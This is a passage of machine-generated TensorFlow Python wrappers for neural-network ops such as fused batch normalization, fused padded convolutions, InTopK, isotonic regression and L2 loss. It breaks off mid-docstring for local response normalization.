def fused_batch_norm_grad_v3_eager_fallback(y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3, epsilon, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, _inputs_T = _execute.args_to_matching_eager([y_backprop, x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
(y_backprop, x) = _inputs_T
_attr_U, _inputs_U = _execute.args_to_matching_eager([reserve_space_1, reserve_space_2, reserve_space_3], ctx, [_dtypes.float32, ])
(reserve_space_1, reserve_space_2, reserve_space_3) = _inputs_U
scale = _ops.convert_to_tensor(scale, _dtypes.float32)
_inputs_flat = [y_backprop, x, scale, reserve_space_1, reserve_space_2, reserve_space_3]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormGradV3", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormGradV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormGradV3Output._make(_result)
return _result
_FusedBatchNormV2Output = collections.namedtuple(
"FusedBatchNormV2",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2"])
def fused_batch_norm_v2(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must be one of the following types: `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `scale`.
batch_variance: A `Tensor`. Has the same type as `scale`.
reserve_space_1: A `Tensor`. Has the same type as `scale`.
reserve_space_2: A `Tensor`. Has the same type as `scale`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormV2", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_v2_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormV2", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV2Output._make(_result)
return _result
FusedBatchNormV2 = tf_export("raw_ops.FusedBatchNormV2")(_ops.to_raw_op(fused_batch_norm_v2))
def fused_batch_norm_v2_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_attr_U, _inputs_U = _execute.args_to_matching_eager([scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(scale, offset, mean, variance) = _inputs_U
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon,
"exponential_avg_factor", exponential_avg_factor, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormV2", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV2Output._make(_result)
return _result
_FusedBatchNormV3Output = collections.namedtuple(
"FusedBatchNormV3",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2", "reserve_space_3"])
def fused_batch_norm_v3(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
Note that the size of 4D Tensors are defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must be one of the following types: `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW", "NDHWC", "NCDHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2, reserve_space_3).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `scale`.
batch_variance: A `Tensor`. Has the same type as `scale`.
reserve_space_1: A `Tensor`. Has the same type as `scale`.
reserve_space_2: A `Tensor`. Has the same type as `scale`.
reserve_space_3: A `Tensor`. Has the same type as `scale`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormV3", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormV3Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_v3_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormV3", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV3Output._make(_result)
return _result
FusedBatchNormV3 = tf_export("raw_ops.FusedBatchNormV3")(_ops.to_raw_op(fused_batch_norm_v3))
def fused_batch_norm_v3_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_attr_U, _inputs_U = _execute.args_to_matching_eager([scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(scale, offset, mean, variance) = _inputs_U
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon,
"exponential_avg_factor", exponential_avg_factor, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormV3", 6, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV3Output._make(_result)
return _result
def fused_pad_conv2d(input, paddings, filter, mode, strides, padding, name=None):
r"""Performs a padding as a preprocess during a convolution.
Similar to FusedResizeAndPadConv2d, this op allows for an optimized
implementation where the spatial padding transformation stage is fused with the
im2col lookup, but in this case without the bilinear filtering required for
resizing. Fusing the padding prevents the need to write out the intermediate
results as whole tensors, reducing memory pressure, and we can get some latency
gains by merging the transformation calculations.
The data_format attribute for Conv2D isn't supported by this op, and 'NHWC'
order is used instead.
Internally this op uses a single per-graph scratch buffer, which means that it
will block if multiple versions are being run in parallel. This is because this
operator is primarily an optimization to minimize memory usage.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
paddings: A `Tensor` of type `int32`.
A two-column matrix specifying the padding sizes. The number of
rows must be the same as the rank of `input`.
filter: A `Tensor`. Must have the same type as `input`. 4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
mode: A `string` from: `"REFLECT", "SYMMETRIC"`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`. Must be in the same order as the dimension specified with format.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedPadConv2D", name, input, paddings, filter, "mode", mode,
"strides", strides, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_pad_conv2d_eager_fallback(
input, paddings, filter, mode=mode, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedPadConv2D", input=input, paddings=paddings, filter=filter,
mode=mode, strides=strides, padding=padding,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "mode", _op.get_attr("mode"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FusedPadConv2D = tf_export("raw_ops.FusedPadConv2D")(_ops.to_raw_op(fused_pad_conv2d))
def fused_pad_conv2d_eager_fallback(input, paddings, filter, mode, strides, padding, name, ctx):
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
paddings = _ops.convert_to_tensor(paddings, _dtypes.int32)
_inputs_flat = [input, paddings, filter]
_attrs = ("T", _attr_T, "mode", mode, "strides", strides, "padding",
padding)
_result = _execute.execute(b"FusedPadConv2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def fused_resize_and_pad_conv2d(input, size, paddings, filter, mode, strides, padding, resize_align_corners=False, name=None):
r"""Performs a resize and padding as a preprocess during a convolution.
It's often possible to do spatial transformations more efficiently as part of
the packing stage of a convolution, so this op allows for an optimized
implementation where these stages are fused together. This prevents the need to
write out the intermediate results as whole tensors, reducing memory pressure,
and we can get some latency gains by merging the transformation calculations.
The data_format attribute for Conv2D isn't supported by this op, and defaults to
'NHWC' order.
Internally this op uses a single per-graph scratch buffer, which means that it
will block if multiple versions are being run in parallel. This is because this
operator is primarily an optimization to minimize memory usage.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
size: A `Tensor` of type `int32`.
A 1-D int32 Tensor of 2 elements: `new_height, new_width`. The
new size for the images.
paddings: A `Tensor` of type `int32`.
A two-column matrix specifying the padding sizes. The number of
rows must be the same as the rank of `input`.
filter: A `Tensor`. Must have the same type as `input`. 4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
mode: A `string` from: `"REFLECT", "SYMMETRIC"`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`. Must be in the same order as the dimension specified with format.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
resize_align_corners: An optional `bool`. Defaults to `False`.
If true, the centers of the 4 corner pixels of the input and output tensors are
aligned, preserving the values at the corner pixels. Defaults to false.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedResizeAndPadConv2D", name, input, size, paddings, filter,
"resize_align_corners", resize_align_corners, "mode", mode, "strides",
strides, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_resize_and_pad_conv2d_eager_fallback(
input, size, paddings, filter,
resize_align_corners=resize_align_corners, mode=mode,
strides=strides, padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_resize_and_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if resize_align_corners is None:
resize_align_corners = False
resize_align_corners = _execute.make_bool(resize_align_corners, "resize_align_corners")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedResizeAndPadConv2D", input=input, size=size, paddings=paddings,
filter=filter, mode=mode, strides=strides,
padding=padding,
resize_align_corners=resize_align_corners,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "resize_align_corners",
_op._get_attr_bool("resize_align_corners"), "mode",
_op.get_attr("mode"), "strides", _op.get_attr("strides"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedResizeAndPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FusedResizeAndPadConv2D = tf_export("raw_ops.FusedResizeAndPadConv2D")(_ops.to_raw_op(fused_resize_and_pad_conv2d))
def fused_resize_and_pad_conv2d_eager_fallback(input, size, paddings, filter, mode, strides, padding, resize_align_corners, name, ctx):
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_resize_and_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if resize_align_corners is None:
resize_align_corners = False
resize_align_corners = _execute.make_bool(resize_align_corners, "resize_align_corners")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
size = _ops.convert_to_tensor(size, _dtypes.int32)
paddings = _ops.convert_to_tensor(paddings, _dtypes.int32)
_inputs_flat = [input, size, paddings, filter]
_attrs = ("T", _attr_T, "resize_align_corners", resize_align_corners,
"mode", mode, "strides", strides, "padding", padding)
_result = _execute.execute(b"FusedResizeAndPadConv2D", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedResizeAndPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def in_top_k(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array, an entry `out[i]` is `true` if the
prediction for the target class is among the top `k` predictions among
all predictions for example `i`. Note that the behavior of `InTopK` differs
from the `TopK` op in its handling of ties; if multiple classes have the
same prediction value and straddle the top-`k` boundary, all of those
classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: An `int`. Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "InTopK", name, predictions, targets, "k", k)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return in_top_k_eager_fallback(
predictions, targets, k=k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
k = _execute.make_int(k, "k")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"InTopK", predictions=predictions, targets=targets, k=k, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("k", _op._get_attr_int("k"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"InTopK", _inputs_flat, _attrs, _result)
_result, = _result
return _result
InTopK = tf_export("raw_ops.InTopK")(_ops.to_raw_op(in_top_k))
def in_top_k_eager_fallback(predictions, targets, k, name, ctx):
k = _execute.make_int(k, "k")
_attr_T, (targets,) = _execute.args_to_matching_eager([targets], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
predictions = _ops.convert_to_tensor(predictions, _dtypes.float32)
_inputs_flat = [predictions, targets]
_attrs = ("k", k, "T", _attr_T)
_result = _execute.execute(b"InTopK", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"InTopK", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def in_top_kv2(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array, an entry `out[i]` is `true` if the
prediction for the target class is among the top `k` predictions among
all predictions for example `i`. Note that the behavior of `InTopK` differs
from the `TopK` op in its handling of ties; if multiple classes have the
same prediction value and straddle the top-`k` boundary, all of those
classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: A `Tensor`. Must have the same type as `targets`.
Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "InTopKV2", name, predictions, targets, k)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return in_top_kv2_eager_fallback(
predictions, targets, k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"InTopKV2", predictions=predictions, targets=targets, k=k, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"InTopKV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
InTopKV2 = tf_export("raw_ops.InTopKV2")(_ops.to_raw_op(in_top_kv2))
def in_top_kv2_eager_fallback(predictions, targets, k, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([targets, k], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
(targets, k) = _inputs_T
predictions = _ops.convert_to_tensor(predictions, _dtypes.float32)
_inputs_flat = [predictions, targets, k]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"InTopKV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"InTopKV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_IsotonicRegressionOutput = collections.namedtuple(
"IsotonicRegression",
["output", "segments"])
def isotonic_regression(input, output_dtype=_dtypes.float32, name=None):
r"""Solves a batch of isotonic regression problems.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
A (batch_size, dim)-tensor holding a batch of inputs.
output_dtype: An optional `tf.DType` from: `tf.half, tf.bfloat16, tf.float32, tf.float64`. Defaults to `tf.float32`.
Dtype of output.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, segments).
output: A `Tensor` of type `output_dtype`.
segments: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "IsotonicRegression", name, input, "output_dtype", output_dtype)
_result = _IsotonicRegressionOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return isotonic_regression_eager_fallback(
input, output_dtype=output_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if output_dtype is None:
output_dtype = _dtypes.float32
output_dtype = _execute.make_type(output_dtype, "output_dtype")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"IsotonicRegression", input=input, output_dtype=output_dtype,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "output_dtype",
_op._get_attr_type("output_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"IsotonicRegression", _inputs_flat, _attrs, _result)
_result = _IsotonicRegressionOutput._make(_result)
return _result
IsotonicRegression = tf_export("raw_ops.IsotonicRegression")(_ops.to_raw_op(isotonic_regression))
def isotonic_regression_eager_fallback(input, output_dtype, name, ctx):
if output_dtype is None:
output_dtype = _dtypes.float32
output_dtype = _execute.make_type(output_dtype, "output_dtype")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("T", _attr_T, "output_dtype", output_dtype)
_result = _execute.execute(b"IsotonicRegression", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"IsotonicRegression", _inputs_flat, _attrs, _result)
_result = _IsotonicRegressionOutput._make(_result)
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.l2_loss')
def l2_loss(t, name=None):
r"""L2 Loss.
Computes half the L2 norm of a tensor without the `sqrt`:
output = sum(t ** 2) / 2
Args:
t: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Typically 2-D, but may have any dimensions.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "L2Loss", name, t)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return l2_loss_eager_fallback(
t, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
l2_loss, (), dict(t=t, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"L2Loss", t=t, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
l2_loss, (), dict(t=t, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"L2Loss", _inputs_flat, _attrs, _result)
_result, = _result
return _result
L2Loss = tf_export("raw_ops.L2Loss")(_ops.to_raw_op(l2_loss))
def l2_loss_eager_fallback(t, name, ctx):
_attr_T, (t,) = _execute.args_to_matching_eager([t], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [t]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"L2Loss", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"L2Loss", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.local_response_normalization', 'nn.lrn')
def lrn(input, depth_radius=5, bias=1, alpha=1, beta=0.5, name=None):
r"""Local Response Normalization.
The 4-D `input` tensor is treated as a 3-D array of 1-D vectors (along the last
dimension), and each vector is normalized independently. Within a given vector,
each component is divided by the weighted, squared sum of inputs within
`depth_radius`. In detail,
sqr_sum[a, b, c, d] =
sum(input[a, b, c, d - depth_radius : d + depth_radius + 1] ** 2)
output = input / (bias + alpha * sqr_sum) ** beta
For details, see [Krizhevsky et al., ImageNet classification with deep
convolutional neural networks (NIPS 2012)](http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks).
Args:
